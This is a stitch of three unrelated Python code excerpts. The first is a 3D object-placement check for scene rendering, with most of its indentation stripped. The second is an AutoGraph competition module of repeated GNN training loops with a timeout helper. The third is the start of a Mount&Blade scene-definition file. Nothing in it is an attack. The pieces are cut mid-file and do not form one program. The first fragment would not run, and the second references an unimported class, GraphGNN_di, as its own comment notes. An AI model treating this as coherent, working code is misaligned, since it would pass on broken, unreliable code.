            rA = True if self.r[2] is None else (minR) >= self.r[2]
            rB = True if self.r[3] is None else (maxR) <= self.r[3]
            r_OK = rA and rB
        BGboundOK_3D = [X_OK, Y_OK, Z_OK, r_OK]
    # (2) Check distance from other objects in 3D
    if Obst is not None:
        nObj = len(Obst)
    else:
        nObj = 0
    ObDstOK_3D = [True] * nObj
    for c in range(nObj):
        ObDstOK_3D[c] = not Ob.collides_with(Obst[c])
    return BGboundOK_3D, ObDstOK_3D
def checkXYZS_2D(self, Ob, Cam, Obst=None, EdgeDist=0., ObOverlap=50.):
"""
Verify that a particular position and size is acceptable given "Obst" obstacles and
the position constraints of this object (in 2D images space).
Inputs:
Ob = the object being placed
Cam = Camera object (for computing perspective)
Obst = list of "Object" instances to specify positions of obstacles to avoid
EdgeDist = proportion of object that can go outside of the 2D image (0.-100.)
ObOverlap = proportion of object that can overlap with other objects (0.-100.)
Returns:
ImBoundOK = boolean; True if 2D projection of XYZpos is less than (EdgeDist) outside of image boundary
ObDistOK = boolean; True if 2D projection of XYZpos overlaps less than (ObOverlap) with other objects/obstacles
"""
# (TODO: Make flexible for EdgeDist, ObOverlap being 0-1 or 0-100?)
#TODO: Currently only looks at object one_wall_distances in the first frame. It is computationally hard, and possibly unnecessary to check it for every frame.
edge_ok_list = []
obdst_ok_list = []
ob_positions = Ob.xyz_trajectory
num_frames = len(ob_positions)
cam_frames_idx = np.floor(np.linspace(0, Cam.frames[-1], num_frames, endpoint = True)).astype(np.int) #select 5 equally spaced camera frames
cam_fix_location = list(np.array([np.linspace(Cam.fix_location[0][i], Cam.fix_location[-1][i],Cam.frames[-1]) for i in range(3)]).T) #interpolate cam fixation location for those frames
cam_location = list(np.array([np.linspace(Cam.location[0][i], Cam.location[-1][i], Cam.frames[-1]) for i in range(3)]).T) #same for camera position
for frame_num in range(num_frames):
object_pos = ob_positions[frame_num]
TmpOb = Object(pos3D=object_pos, size3D=Ob.size3D)
tmpIP_Top, tmpIP_Bot, tmpIP_L, tmpIP_R = bvpu.math.perspective_projection(TmpOb, Cam, ImSz=(100, 100),cam_location=cam_location[frame_num],cam_fix_location= cam_fix_location[frame_num],cam_lens = Cam.lens)
TmpObSz_X = abs(tmpIP_R[0]-tmpIP_L[0])
TmpObSz_Y = abs(tmpIP_Bot[1]-tmpIP_Top[1])
TmpImPos = [np.mean([tmpIP_R[0], tmpIP_L[0]]), np.mean([tmpIP_Bot[1], tmpIP_Top[1]])]
### --- (1) Check distance from screen edges --- ###
Top_OK = EdgeDist < tmpIP_Top[1]
Bot_OK = 100-EdgeDist > tmpIP_Bot[1]
L_OK = EdgeDist < tmpIP_L[0]
R_OK = 100-EdgeDist > tmpIP_R[0]
EdgeOK_2D = all([Top_OK, Bot_OK, L_OK, R_OK])
### --- (2) Check distance from other objects in 2D --- ###
if Obst:
nObj = len(Obst)
else:
nObj = 0
obstPos2D_List = []
Dist_List = []
Dthresh_List = []
ObstSz_List = []
ObDstOK_2D = [True for x in range(nObj)]
for c in range(nObj):
| |
# Repository: hxttkl/KDD_CUP_AutoGraph_AutoEnsemble
from __future__ import with_statement # Required in 2.5
import torch
import torch.nn.functional as F
from sub_models import GatedGNN
from sub_models import GatedGCN
from sub_models_di import GatedGNN_di
from sub_models_di import GatedGIN_di
from sub_models import GatedGIN
from sub_models import Lin2_APPNP
from sub_models import GCN_APPNP
from sub_models import StopEarly
from sub_models import GIN
from sub_models import GCN
from sub_models import GAT
from sub_models import ARMA
from sub_models import GMM
from sub_models import GraphGNN
from sub_models import MF
from sub_models import AGNN
from sub_models import SAGE
import xgboost as xgb
from xgboost import XGBClassifier
from sklearn.ensemble import RandomForestClassifier
import time
import gc
import signal
from contextlib import contextmanager
class TimeoutException(Exception): pass  # Raised by time_limit() when the SIGALRM watchdog fires.
def random_weight(num):
    """Draw `num` random ensemble weights, uniform in [0.5, 1.5), shaped (num, 1)."""
    w = torch.rand(num) + 0.5
    return w.view(-1, 1)
@contextmanager
def time_limit(seconds):
    """Context manager raising TimeoutException if the body exceeds `seconds`.

    Unix-only (uses SIGALRM), and must run in the main thread. The previous
    SIGALRM handler is restored on exit so other users of the signal are not
    clobbered — the original version left its handler installed forever.
    """
    def signal_handler(signum, frame):
        raise TimeoutException
    old_handler = signal.signal(signal.SIGALRM, signal_handler)
    signal.alarm(seconds)
    try:
        yield
    finally:
        signal.alarm(0)  # cancel any pending alarm
        signal.signal(signal.SIGALRM, old_handler)
def rf_train(train_x, train_y, test_x):
    """Fit a 600-tree random forest on (train_x, train_y) and return the
    predicted class probabilities for test_x."""
    forest = RandomForestClassifier(n_jobs=4, n_estimators=600, random_state=123)
    forest.fit(train_x, train_y)
    return forest.predict_proba(test_x)
def label_train_and_predict(data, sample_mask, val_mask, node_norm, time_control):
    """Fit a random forest on the labelled nodes' raw features and return
    log-softmax class scores for every node, or None if the remaining time
    budget is exhausted before training finishes."""
    data = data.to('cpu')
    features = data.feature.cpu().numpy()
    train_y = data.y[sample_mask.cpu()].numpy()
    train_x = features[sample_mask.cpu(), :]
    start = time.time()
    try:
        # Abort via SIGALRM if the forest takes longer than the budget allows.
        with time_limit(time_control.get_remain_time()):
            y_pred = rf_train(train_x, train_y, features)
        elapsed = time.time() - start
        print("label训练时间", elapsed)
        scores = torch.tensor(y_pred, dtype=torch.float)
        return F.log_softmax(scores, dim=-1).numpy()
    except TimeoutException:
        print("Timed out!")
        return None
def gcn_train(data, aggr, sample_mask, val_mask, node_norm, device, time_control, hidden):
    """Train a 2-layer GCN on `data` and return per-node class scores.

    Parameters
    ----------
    data : graph object exposing .x (features) and .y (labels); moved to `device`.
    aggr : label used only in the progress print.
    sample_mask : mask selecting training nodes.
    val_mask : mask selecting validation nodes.
    node_norm : optional per-node loss weights; when given, the unreduced NLL
        loss is scaled by it and averaged.
    device : torch device to train on.
    time_control : budget object; isTimeToStop() forces an early exit.
    hidden : hidden-layer width.

    Returns
    -------
    numpy.ndarray of per-node scores, or None if training failed or was
    aborted before epoch 150.
    """
    num_class = int(max(data.y)) + 1
    model = GCN(features_num=data.x.size()[1], num_class=num_class, hidden=hidden, num_layers=2)
    model = model.to(device)
    data = data.to(device)
    optimizer = torch.optim.Adam(model.parameters(), lr=0.005, weight_decay=0.0005)
    print(aggr, "开始训练")
    t = StopEarly(2)
    try:
        for epoch in range(1, 501):
            model.train()
            optimizer.zero_grad()
            out = model(data)
            if node_norm is not None:  # was `!= None`; identity is the correct None test
                loss = F.nll_loss(out[sample_mask], data.y[sample_mask], reduction='none')
                loss = (loss * node_norm).mean()
            else:
                loss = F.nll_loss(out[sample_mask], data.y[sample_mask])
            if epoch % 25 == 0:
                # Periodic validation: feeds the early-stopper and time budget.
                model.eval()
                out = model(data)
                _, pred = out.max(dim=1)
                correct = float(pred[val_mask].eq(data.y[val_mask]).sum().item())
                acc3 = correct / (val_mask.sum().item())
                if time_control.isTimeToStop():
                    if epoch <= 150:
                        return None  # stopped too early for the model to be useful
                    return out.detach().cpu().numpy()
                if t.isTimeToStop(1 - acc3, model, epoch):
                    end_epoch = epoch
                    print("早停", end_epoch)
                    break
            loss.backward()
            optimizer.step()
        model.eval()
        with torch.no_grad():
            out = model(data)
        pred = out.detach().cpu().numpy()
        # Free GPU memory before returning.
        del model
        del out
        del optimizer
        gc.collect()
        torch.cuda.empty_cache()
    except Exception:  # was a bare `except:`, which also swallowed KeyboardInterrupt/SystemExit
        del model
        del optimizer
        torch.cuda.empty_cache()
        return None
    return pred
def gated_train(data, aggr, sample_mask, val_mask, node_norm, device, time_control, hidden, conv_aggr):
    """Train a 2-layer GatedGCN (message aggregation `conv_aggr`) on `data`.

    Same loop as gcn_train: optional per-node loss weights (`node_norm`),
    validation every 25 epochs for early stopping and the `time_control`
    budget. Returns per-node scores as a numpy array, or None on failure /
    when stopped before epoch 150.
    """
    num_class = int(max(data.y)) + 1
    model = GatedGCN(features_num=data.x.size()[1], num_class=num_class, hidden=hidden, num_layers=2, aggr=conv_aggr)
    model = model.to(device)
    data = data.to(device)
    optimizer = torch.optim.Adam(model.parameters(), lr=0.005, weight_decay=0.0005)
    print(aggr, "开始训练")
    t = StopEarly(2)
    try:
        for epoch in range(1, 501):
            model.train()
            optimizer.zero_grad()
            out = model(data)
            if node_norm is not None:  # was `!= None`
                loss = F.nll_loss(out[sample_mask], data.y[sample_mask], reduction='none')
                loss = (loss * node_norm).mean()
            else:
                loss = F.nll_loss(out[sample_mask], data.y[sample_mask])
            if epoch % 25 == 0:
                # Periodic validation: feeds the early-stopper and time budget.
                model.eval()
                out = model(data)
                _, pred = out.max(dim=1)
                correct = float(pred[val_mask].eq(data.y[val_mask]).sum().item())
                acc3 = correct / (val_mask.sum().item())
                if time_control.isTimeToStop():
                    if epoch <= 150:
                        return None  # stopped too early for the model to be useful
                    return out.detach().cpu().numpy()
                if t.isTimeToStop(1 - acc3, model, epoch):
                    end_epoch = epoch
                    print("早停", end_epoch)
                    break
            loss.backward()
            optimizer.step()
        model.eval()
        with torch.no_grad():
            out = model(data)
        pred = out.detach().cpu().numpy()
        # Free GPU memory before returning.
        del model
        del out
        del optimizer
        gc.collect()
        torch.cuda.empty_cache()
    except Exception:  # was a bare `except:`, which also swallowed KeyboardInterrupt/SystemExit
        del model
        del optimizer
        torch.cuda.empty_cache()
        return None
    return pred
def graphnn_train(data, aggr, sample_mask, val_mask, node_norm, device, time_control):
    """Train a 2-layer GraphGNN (hidden width fixed at 64) on `data`.

    Same loop as gcn_train: optional per-node loss weights (`node_norm`),
    validation every 25 epochs for early stopping and the `time_control`
    budget. Returns per-node scores as a numpy array, or None on failure /
    when stopped before epoch 150.
    """
    num_class = int(max(data.y)) + 1
    model = GraphGNN(features_num=data.x.size()[1], num_class=num_class, hidden=64, num_layers=2)
    model = model.to(device)
    data = data.to(device)
    optimizer = torch.optim.Adam(model.parameters(), lr=0.005, weight_decay=0.0005)
    print(aggr, "开始训练")
    t = StopEarly(2)
    try:
        for epoch in range(1, 501):
            model.train()
            optimizer.zero_grad()
            out = model(data)
            if node_norm is not None:  # was `!= None`
                loss = F.nll_loss(out[sample_mask], data.y[sample_mask], reduction='none')
                loss = (loss * node_norm).mean()
            else:
                loss = F.nll_loss(out[sample_mask], data.y[sample_mask])
            if epoch % 25 == 0:
                # Periodic validation: feeds the early-stopper and time budget.
                model.eval()
                out = model(data)
                _, pred = out.max(dim=1)
                correct = float(pred[val_mask].eq(data.y[val_mask]).sum().item())
                acc3 = correct / (val_mask.sum().item())
                if time_control.isTimeToStop():
                    if epoch <= 150:
                        return None  # stopped too early for the model to be useful
                    return out.detach().cpu().numpy()
                if t.isTimeToStop(1 - acc3, model, epoch):
                    end_epoch = epoch
                    print("早停", end_epoch)
                    break
            loss.backward()
            optimizer.step()
        model.eval()
        with torch.no_grad():
            out = model(data)
        pred = out.detach().cpu().numpy()
        # Free GPU memory before returning.
        del model
        del out
        del optimizer
        gc.collect()
        torch.cuda.empty_cache()
    except Exception:  # was a bare `except:`, which also swallowed KeyboardInterrupt/SystemExit
        del model
        del optimizer
        torch.cuda.empty_cache()
        return None
    return pred
def graphnn_di_train(data, aggr, sample_mask, val_mask, node_norm, device, time_control):
    """Train a directed GraphGNN variant (hidden width fixed at 64) on `data`.

    Same loop as gcn_train: optional per-node loss weights (`node_norm`),
    validation every 25 epochs for early stopping and the `time_control`
    budget. Returns per-node scores as a numpy array, or None on failure /
    when stopped before epoch 150.
    """
    num_class = int(max(data.y)) + 1
    # NOTE(review): GraphGNN_di is never imported at the top of this file
    # (only GatedGNN_di / GatedGIN_di are), so this line likely raises
    # NameError — confirm the intended class/import.
    model = GraphGNN_di(features_num=data.x.size()[1], num_class=num_class, hidden=64, num_layers=2)
    model = model.to(device)
    data = data.to(device)
    optimizer = torch.optim.Adam(model.parameters(), lr=0.005, weight_decay=0.0005)
    print(aggr, "开始训练")
    t = StopEarly(2)
    try:
        for epoch in range(1, 501):
            model.train()
            optimizer.zero_grad()
            out = model(data)
            if node_norm is not None:  # was `!= None`
                loss = F.nll_loss(out[sample_mask], data.y[sample_mask], reduction='none')
                loss = (loss * node_norm).mean()
            else:
                loss = F.nll_loss(out[sample_mask], data.y[sample_mask])
            if epoch % 25 == 0:
                # Periodic validation: feeds the early-stopper and time budget.
                model.eval()
                out = model(data)
                _, pred = out.max(dim=1)
                correct = float(pred[val_mask].eq(data.y[val_mask]).sum().item())
                acc3 = correct / (val_mask.sum().item())
                if time_control.isTimeToStop():
                    if epoch <= 150:
                        return None  # stopped too early for the model to be useful
                    return out.detach().cpu().numpy()
                if t.isTimeToStop(1 - acc3, model, epoch):
                    end_epoch = epoch
                    print("早停", end_epoch)
                    break
            loss.backward()
            optimizer.step()
        model.eval()
        with torch.no_grad():
            out = model(data)
        pred = out.detach().cpu().numpy()
        # Free GPU memory before returning.
        del model
        del out
        del optimizer
        gc.collect()
        torch.cuda.empty_cache()
    except Exception:  # was a bare `except:`, which also swallowed KeyboardInterrupt/SystemExit
        del model
        del optimizer
        torch.cuda.empty_cache()
        return None
    return pred
def mf_train(data, aggr, sample_mask, val_mask, node_norm, device, time_control):
    """Train a 2-layer MF model (hidden width fixed at 32) on `data`.

    Same loop as gcn_train: optional per-node loss weights (`node_norm`),
    validation every 25 epochs for early stopping and the `time_control`
    budget. Returns per-node scores as a numpy array, or None on failure /
    when stopped before epoch 150.
    """
    num_class = int(max(data.y)) + 1
    model = MF(features_num=data.x.size()[1], num_class=num_class, hidden=32, num_layers=2)
    model = model.to(device)
    data = data.to(device)
    optimizer = torch.optim.Adam(model.parameters(), lr=0.005, weight_decay=0.0005)
    print(aggr, "开始训练")
    t = StopEarly(2)
    try:
        for epoch in range(1, 501):
            model.train()
            optimizer.zero_grad()
            out = model(data)
            if node_norm is not None:  # was `!= None`
                loss = F.nll_loss(out[sample_mask], data.y[sample_mask], reduction='none')
                loss = (loss * node_norm).mean()
            else:
                loss = F.nll_loss(out[sample_mask], data.y[sample_mask])
            if epoch % 25 == 0:
                # Periodic validation: feeds the early-stopper and time budget.
                model.eval()
                out = model(data)
                _, pred = out.max(dim=1)
                correct = float(pred[val_mask].eq(data.y[val_mask]).sum().item())
                acc3 = correct / (val_mask.sum().item())
                if time_control.isTimeToStop():
                    if epoch <= 150:
                        return None  # stopped too early for the model to be useful
                    return out.detach().cpu().numpy()
                if t.isTimeToStop(1 - acc3, model, epoch):
                    end_epoch = epoch
                    print("早停", end_epoch)
                    break
            loss.backward()
            optimizer.step()
        model.eval()
        with torch.no_grad():
            out = model(data)
        pred = out.detach().cpu().numpy()
        # Free GPU memory before returning.
        del model
        del out
        del optimizer
        gc.collect()
        torch.cuda.empty_cache()
    except Exception:  # was a bare `except:`, which also swallowed KeyboardInterrupt/SystemExit
        del model
        del optimizer
        torch.cuda.empty_cache()
        return None
    return pred
def ggnn_di_train(data, aggr, sample_mask, val_mask, node_norm, device, time_control, hidden, conv_aggr):
    """Train a directed GatedGNN (aggregation `conv_aggr`) on `data`.

    Same loop as gcn_train: optional per-node loss weights (`node_norm`),
    validation every 25 epochs for early stopping and the `time_control`
    budget. Returns per-node scores as a numpy array, or None on failure /
    when stopped before epoch 150.
    """
    num_class = int(max(data.y)) + 1
    model = GatedGNN_di(features_num=data.x.size()[1], num_class=num_class, hidden=hidden, aggr=conv_aggr)
    model = model.to(device)
    data = data.to(device)
    optimizer = torch.optim.Adam(model.parameters(), lr=0.005, weight_decay=0.0005)
    print(aggr, "开始训练")
    t = StopEarly(2)
    try:
        for epoch in range(1, 501):
            model.train()
            optimizer.zero_grad()
            out = model(data)
            if node_norm is not None:  # was `!= None`
                loss = F.nll_loss(out[sample_mask], data.y[sample_mask], reduction='none')
                loss = (loss * node_norm).mean()
            else:
                loss = F.nll_loss(out[sample_mask], data.y[sample_mask])
            if epoch % 25 == 0:
                # Periodic validation: feeds the early-stopper and time budget.
                model.eval()
                out = model(data)
                _, pred = out.max(dim=1)
                correct = float(pred[val_mask].eq(data.y[val_mask]).sum().item())
                acc3 = correct / (val_mask.sum().item())
                if time_control.isTimeToStop():
                    if epoch <= 150:
                        return None  # stopped too early for the model to be useful
                    return out.detach().cpu().numpy()
                if t.isTimeToStop(1 - acc3, model, epoch):
                    end_epoch = epoch
                    print("早停", end_epoch)
                    break
            loss.backward()
            optimizer.step()
        model.eval()
        with torch.no_grad():
            out = model(data)
        pred = out.detach().cpu().numpy()
        # Free GPU memory before returning.
        del model
        del out
        del optimizer
        gc.collect()
        torch.cuda.empty_cache()
    except Exception:  # was a bare `except:`, which also swallowed KeyboardInterrupt/SystemExit
        del model
        del optimizer
        torch.cuda.empty_cache()
        return None
    return pred
def ggin_train(data, aggr, sample_mask, val_mask, node_norm, device, time_control, hidden):
    """Train a GatedGIN on `data`.

    Same loop as gcn_train: optional per-node loss weights (`node_norm`),
    validation every 25 epochs for early stopping and the `time_control`
    budget. Returns per-node scores as a numpy array, or None on failure /
    when stopped before epoch 150.
    """
    num_class = int(max(data.y)) + 1
    model = GatedGIN(features_num=data.x.size()[1], num_class=num_class, hidden=hidden)
    model = model.to(device)
    data = data.to(device)
    optimizer = torch.optim.Adam(model.parameters(), lr=0.005, weight_decay=0.0005)
    print(aggr, "开始训练")
    t = StopEarly(2)
    try:
        for epoch in range(1, 501):
            model.train()
            optimizer.zero_grad()
            out = model(data)
            if node_norm is not None:  # was `!= None`
                loss = F.nll_loss(out[sample_mask], data.y[sample_mask], reduction='none')
                loss = (loss * node_norm).mean()
            else:
                loss = F.nll_loss(out[sample_mask], data.y[sample_mask])
            if epoch % 25 == 0:
                # Periodic validation: feeds the early-stopper and time budget.
                model.eval()
                out = model(data)
                _, pred = out.max(dim=1)
                correct = float(pred[val_mask].eq(data.y[val_mask]).sum().item())
                acc3 = correct / (val_mask.sum().item())
                if time_control.isTimeToStop():
                    if epoch <= 150:
                        return None  # stopped too early for the model to be useful
                    return out.detach().cpu().numpy()
                if t.isTimeToStop(1 - acc3, model, epoch):
                    end_epoch = epoch
                    print("早停", end_epoch)
                    break
            loss.backward()
            optimizer.step()
        model.eval()
        with torch.no_grad():
            out = model(data)
        pred = out.detach().cpu().numpy()
        # Free GPU memory before returning.
        del model
        del out
        del optimizer
        gc.collect()
        torch.cuda.empty_cache()
    except Exception:  # was a bare `except:`, which also swallowed KeyboardInterrupt/SystemExit
        del model
        del optimizer
        torch.cuda.empty_cache()
        return None
    return pred
def ggin_di_train(data, aggr, sample_mask, val_mask, node_norm, device, time_control, hidden):
    """Train a directed GatedGIN on `data`.

    Same loop as gcn_train: optional per-node loss weights (`node_norm`),
    validation every 25 epochs for early stopping and the `time_control`
    budget. Returns per-node scores as a numpy array, or None on failure /
    when stopped before epoch 150.
    """
    num_class = int(max(data.y)) + 1
    model = GatedGIN_di(features_num=data.x.size()[1], num_class=num_class, hidden=hidden)
    model = model.to(device)
    data = data.to(device)
    optimizer = torch.optim.Adam(model.parameters(), lr=0.005, weight_decay=0.0005)
    print(aggr, "开始训练")
    t = StopEarly(2)
    try:
        for epoch in range(1, 501):
            model.train()
            optimizer.zero_grad()
            out = model(data)
            if node_norm is not None:  # was `!= None`
                loss = F.nll_loss(out[sample_mask], data.y[sample_mask], reduction='none')
                loss = (loss * node_norm).mean()
            else:
                loss = F.nll_loss(out[sample_mask], data.y[sample_mask])
            if epoch % 25 == 0:
                # Periodic validation: feeds the early-stopper and time budget.
                model.eval()
                out = model(data)
                _, pred = out.max(dim=1)
                correct = float(pred[val_mask].eq(data.y[val_mask]).sum().item())
                acc3 = correct / (val_mask.sum().item())
                if time_control.isTimeToStop():
                    if epoch <= 150:
                        return None  # stopped too early for the model to be useful
                    return out.detach().cpu().numpy()
                if t.isTimeToStop(1 - acc3, model, epoch):
                    end_epoch = epoch
                    print("早停", end_epoch)
                    break
            loss.backward()
            optimizer.step()
        model.eval()
        with torch.no_grad():
            out = model(data)
        pred = out.detach().cpu().numpy()
        # Free GPU memory before returning.
        del model
        del out
        del optimizer
        gc.collect()
        torch.cuda.empty_cache()
    except Exception:  # was a bare `except:`, which also swallowed KeyboardInterrupt/SystemExit
        del model
        del optimizer
        torch.cuda.empty_cache()
        return None
    return pred
def mean_train(data, aggr, sample_mask, val_mask, node_norm, device,
time_control):
num_class = int(max(data.y)) + 1
model = GatedGCN(features_num=data.x.size()[1],num_class=num_class,hidden=64,num_layers=2,aggr='mean',res=True)
model = model.to(device)
| |
# File: src/module_scenes.py
from header_common import *
from header_operations import *
from header_triggers import *
from header_scenes import *
from module_constants import *
####################################################################################################################
# Each scene record contains the following fields:
# 1) Scene id {string}: used for referencing scenes in other files. The prefix scn_ is automatically added before each scene-id.
# 2) Scene flags {int}. See header_scenes.py for a list of available flags
# 3) Mesh name {string}: This is used for indoor scenes only. Use the keyword "none" for outdoor scenes.
# 4) Body name {string}: This is used for indoor scenes only. Use the keyword "none" for outdoor scenes.
# 5) Min-pos {(float,float)}: minimum (x,y) coordinate. Player can't move beyond this limit.
# 6) Max-pos {(float,float)}: maximum (x,y) coordinate. Player can't move beyond this limit.
# 7) Water-level {float}.
# 8) Terrain code {string}: You can obtain the terrain code by copying it from the terrain generator screen
# 9) List of other scenes accessible from this scene {list of strings}.
# (deprecated. This will probably be removed in future versions of the module system)
# (In the new system passages are used to travel between scenes and
# the passage's variation-no is used to select the game menu item that the passage leads to.)
# 10) List of chest-troops used in this scene {list of strings}. You can access chests by placing them in edit mode.
# The chest's variation-no is used with this list for selecting which troop's inventory it will access.
# town_1 Sargoth #plain
# town_2 Tihr #steppe
# town_3 Veluca #steppe
# town_4 Suno #plain
# town_5 Jelkala #plain
# town_6 Praven #plain
# town_7 Uxkhal #plain
# town_8 Reyvadin #plain
# town_9 Khudan #snow
# town_10 Tulga #steppe
# town_11 Curaw #snow
# town_12 Wercheg #plain
# town_13 Rivacheg #plain
# town_14 Halmar #steppe
# town_15 Yalen
# town_16 Dhirim
# town_17 Ichamur
# town_18 Narra
# town_19 Shariz
# town_20 Durquba
# town_21 Ahmerrad
# town_22 Bariyye
####################################################################################################################
scenes = [
("random_scene", sf_generate|sf_randomize|sf_auto_entry_points, "none", "none", (0.00, 0.00), (240.00, 240.00), -0.5, "0x300028000003e8fa0000034e00004b34000059be", [], []),
("conversation_scene", sf_generate, "none", "none", (-40.00, -40.00), (40.00, 40.00), -100.0, "0x0000000032c045050002308c0000769a0000644f00004095", [], []),
("water", 0, "none", "none", (-1000.00, -1000.00), (1000.00, 1000.00), -0.5, "0", [], []),
####Moved down
#("random_scene_steppe", sf_generate|sf_randomize|sf_auto_entry_points, "none", "none", (0.00, 0.00), (240.00, 240.00), -0.5, "0x000000023160050000079dea00003efe00004b34000059be", [], [], "outer_terrain_steppe"),
#
#("random_scene_plain", sf_generate|sf_randomize|sf_auto_entry_points, "none", "none", (0.00, 0.00), (240.00, 240.00), -0.5, "0x000000023160050000079dea00003efe00004b34000059be", [], [], "outer_terrain_plain"),
#
#("random_scene_snow", sf_generate|sf_randomize|sf_auto_entry_points, "none", "none", (0.00, 0.00), (240.00, 240.00), -0.5, "0x000000024620050000079dea00003efe00004b34000059be", [], [], "outer_terrain_snow"),
#
#("random_scene_desert", sf_generate|sf_randomize|sf_auto_entry_points, "none", "none", (0.00, 0.00), (240.00, 240.00), -0.5, "0x000000023160050000079dea00003efe00004b34000059be", [], [], "outer_terrain_desert_b"),
#
#("random_scene_steppe_forest", sf_generate|sf_randomize|sf_auto_entry_points, "none", "none", (0.00, 0.00), (240.00, 240.00), -0.5, "0x0000000230000500000775de0000034e00004b34000059be", [], [], "outer_terrain_plain"),
#
#("random_scene_plain_forest", sf_generate|sf_randomize|sf_auto_entry_points, "none", "none", (0.00, 0.00), (240.00, 240.00), 0.0, "0x00000000b42005000004bd320000079a00004b3400007dd2", [], [], "outer_terrain_plain"),
#
#("random_scene_snow_forest", sf_generate|sf_randomize|sf_auto_entry_points, "none", "none", (0.00, 0.00), (240.00, 240.00), -0.5, "0x00000002cc600500000775de0000034e00004b34000059be", [], [], "outer_terrain_snow"),
#
#("random_scene_desert_forest", sf_generate|sf_randomize|sf_auto_entry_points, "none", "none", (0.00, 0.00), (240.00, 240.00), -0.5, "0x0000000230000500000775de0000034e00004b34000059be", [], [], "outer_terrain_desert_b"),
####End moved down
("camp_scene", sf_generate|sf_auto_entry_points, "none", "none", (0.00, 0.00), (240.00, 240.00), -0.5, "0x300028000003e8fa0000034e00004b34000059be", [], [], "outer_terrain_plain"),
("camp_scene_horse_track", sf_generate|sf_auto_entry_points, "none", "none", (0.00, 0.00), (240.00, 240.00), -0.5, "0x300028000003e8fa0000034e00004b34000059be", [], [], "outer_terrain_plain"),
("four_ways_inn", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x0000000030015f2b000350d4000011a4000017ee000054af", [], [], "outer_terrain_town_thir_1"),
("test_scene", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x0230817a00028ca300007f4a0000479400161992", [], [], "outer_terrain_plain"),
("quick_battle_1", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x30401ee300059966000001bf0000299a0000638f", [], [], "outer_terrain_plain"),
("quick_battle_2", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0xa0425ccf0004a92a000063d600005a8a00003d9a", [], [], "outer_terrain_steppe"),
("quick_battle_3", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x4c6024e3000691a400001b7c0000591500007b52", [], [], "outer_terrain_snow"),
("quick_battle_4", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x00001d63c005114300006228000053bf00004eb9", [], [], "outer_terrain_plain"),
("quick_battle_5", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x3a078bb2000589630000667200002fb90000179c", [], [], "outer_terrain_plain"),
("quick_battle_6", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0xa0425ccf0004a92a000063d600005a8a00003d9a", [], [], "outer_terrain_steppe"),
("quick_battle_7", sf_generate, "none", "none", (0.00, 0.00), (100.00, 100.00), -100.0, "0x314d060900036cd70000295300002ec9000025f3", [], [], "outer_terrain_plain"),
("salt_mine", sf_generate, "none", "none", (-200.00, -200.00), (200.00, 200.00), -100.0, "0x2a07b23200025896000023ee00007f9c000022a8", [], [], "outer_terrain_steppe"),
("novice_ground", sf_indoors, "training_house_a", "bo_training_house_a", (-100.00, -100.00), (100.00, 100.00), -100.0, "0", [], []),
("zendar_arena", sf_generate, "none", "none", (0.00, 0.00), (100.00, 100.00), -100.0, "0xa0001d9300031ccb0000156f000048ba0000361c", [], [], "outer_terrain_plain"),
("dhorak_keep", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x33a7946000028ca300007f4a0000479400161992", ["exit"], []),
("reserved4", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "28791", [], []),
("reserved5", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "117828", [], []),
("reserved6", sf_generate, "none", "none", (0.00, 0.00), (100.00, 100.00), -100.0, "6849", [], []),
("reserved7", sf_generate, "none", "none", (0.00, 0.00), (100.00, 100.00), -100.0, "6849", [], []),
("reserved8", sf_generate, "none", "none", (0.00, 0.00), (100.00, 100.00), -100.0, "13278", [], []),
("reserved9", sf_indoors, "thirsty_lion", "bo_thirsty_lion", (-100.00, -100.00), (100.00, 100.00), -100.0, "0", [], []),
("reserved10", 0, "none", "none", (-100.00, -100.00), (100.00, 100.00), -100.0, "0", [], []),
#
("reserved11", 0, "none", "none", (-100.00, -100.00), (100.00, 100.00), -100.0, "0", [], []),
("reserved12", sf_indoors, "thirsty_lion", "bo_thirsty_lion", (-100.00, -100.00), (100.00, 100.00), -100.0, "0", [], []),
("training_ground", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x30000500400360d80000189f00002a8380006d91", [], ["tutorial_chest_1", "tutorial_chest_2"], "outer_terrain_plain_1"),
("tutorial_1", sf_indoors, "tutorial_1_scene", "bo_tutorial_1_scene", (-100.00, -100.00), (100.00, 100.00), -100.0, "0", [], []),
("tutorial_2", sf_indoors, "tutorial_2_scene", "bo_tutorial_2_scene", (-100.00, -100.00), (100.00, 100.00), -100.0, "0", [], []),
("tutorial_3", sf_indoors, "tutorial_3_scene", "bo_tutorial_3_scene", (-100.00, -100.00), (100.00, 100.00), -100.0, "0", [], []),
("tutorial_4", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x30000500400360d80000189f00002a8380006d91", [], [], "outer_terrain_plain"),
("tutorial_5", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x3a06dca80005715c0000537400001377000011fe", [], [], "outer_terrain_plain"),
("tutorial_6", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x3a06dca80005715c0000537400001377000011fe", [], [], "outer_terrain_plain"),
("tutorial_7", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x3a06dca80005715c0000537400001377000011fe", [], [], "outer_terrain_plain"),
("tutorial_8", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x3a06dca80005715c0000537400001377000011fe", [], [], "outer_terrain_plain"),
("tutorial_9", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x3a06dca80005715c0000537400001377000011fe", [], [], "outer_terrain_plain"),
("training_ground_horse_track_1", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x00000000337553240004d53700000c0500002a0f80006267", [], [], "outer_terrain_plain"),
